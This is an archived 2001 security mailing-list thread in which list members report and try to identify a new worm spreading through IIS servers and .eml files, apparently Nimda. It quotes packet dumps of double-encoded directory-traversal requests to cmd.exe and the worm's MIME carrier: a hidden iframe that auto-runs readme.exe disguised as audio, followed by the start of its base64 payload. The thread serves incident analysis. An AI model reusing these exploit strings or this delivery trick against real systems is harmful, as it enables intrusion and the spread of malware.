Kirk, what version of Windows are you running? Have you got an active IIS server? It probably came in that way, unless there are other propagation means we didn't isolate yet. Please tell us what kind of connectivity you've got (shared drives, FTP, IIS running, etc)... Thanks, Pedro. At 10:13 -0600 18.09.01, Kirk Ellsworth wrote: >I have received this as well. It looks like there are over 1000 >sample.eml and desktop.eml on my pc? Attached in the 77kb email is a >txt file and a reamme.exe. >I have no downloaded anything or opened any weird attachments and I >received it this morning at about 7:30 mnt. It spread every where on my >pc at 8:05. > >I am only able to delete about 40% of the .em;'s. If anyone has a good >idea on this one please pass it on. > >-----Original Message----- >From: Pedro Miller Rabinovitch [mailto:pedroat_private] >Sent: Tuesday, September 18, 2001 9:14 AM >To: forensicsat_private >Cc: Cory McIntire; focus-msat_private; >focus-idsat_private >Subject: New worm? 'readme.eml' > > >Hi, > > is this CodeBlue? Some new worm? Or just one I hadn't heard about? >It uses double-encoding exploits, and propagates both by adding >javascript to the main page and by probing other systems... > >Report: > >Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS: > >Date Time D Source IP Sport Dport P >01Sep18 11:20 T 200.192.226.40 3933 80 T >01Sep18 11:20 T 200.192.226.40 3767 80 T >01Sep18 11:20 T 200.192.226.40 3572 80 T > > SOURCE: 200.192.226.40 > > 45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx >E...ba@.w..=...(xxxx > 0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00 >...P{....~.NP."8.z.. > 47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET >/_vti_bin/..%255 > 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 >c../..%255c../..%255 > 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 >c../winnt/system32/c > 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 >md.exe?/c+dir HTTP/1 > 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e >.0..Host: www..Connn > 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection: >close.... > > 45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx >E....c@.w..:...(xxxx > 0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00 >...P{....O..P."8.... > 47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET >/_mem_bin/..%255 > 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 >c../..%255c../..%255 > 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 >c../winnt/system32/c > 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 >md.exe?/c+dir HTTP/1 > 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e >.0..Host: www..Connn > 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection: >close.... > > 45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx >E...9e@.w.?....(xxxx > 0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00 >.].P{."6.LZ.P."8.6.. > 47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET >/msadc/..%255c.. > 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e >/..%255c../..%255c/. > 2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e >.%c1%1c../..%c1%1c.. > 2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 >/..%c1%1c../winnt/sy > 73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 >stem32/cmd.exe?/c+di > 72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 r >HTTP/1.0..Host: ww > 77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 >w..Connnection: clos > 65 0d 0a 0d 0a e.... > >--------------- > >When I connected to the originating server (femm.tdkomm.com.br), I >saw the normal web page for the institution, plus a pop-up window for >http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as >follows: > > >MIME-Version: 1.0 >Content-Type: multipart/related; >type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" >X-Priority: 3 >X-MSMail-Priority: Normal >X-Unsent: 1 > >--====_ABC1234567890DEF_==== >Content-Type: multipart/alternative; >boundary="====_ABC0987654321DEF_====" > >--====_ABC0987654321DEF_==== >Content-Type: text/html; >charset="iso-8859-1" >Content-Transfer-Encoding: quoted-printable > > ><HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> ><iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> ></iframe></BODY></HTML> >--====_ABC0987654321DEF_====-- > >--====_ABC1234567890DEF_==== >Content-Type: audio/x-wav; >name="readme.exe" >Content-Transfer-Encoding: base64 >Content-ID: <EA4DMGBP9p> > >TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >AAAA >AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9T >IG1v >ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88 >cbVO >PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1 >Oqc7 >AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQA >AAAA >... (worm code follows) > >I've inspected the executable code, and it reads like a worm. (doh) > >Has anyone seen this? > >Regards, > > Pedro. >-- >Pedro Miller Rabinovitch >Technology Manager >Cipher Technology >55-21-2579-3999 >http://www.cipher.com.br -- Pedro Miller Rabinovitch Gerente Geral de Tecnologia Cipher Technology 21-2579-3999 www.cipher.com.br _____ "Segurança em TI - uma especialidade Cipher Technology" ----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:23:54 PDT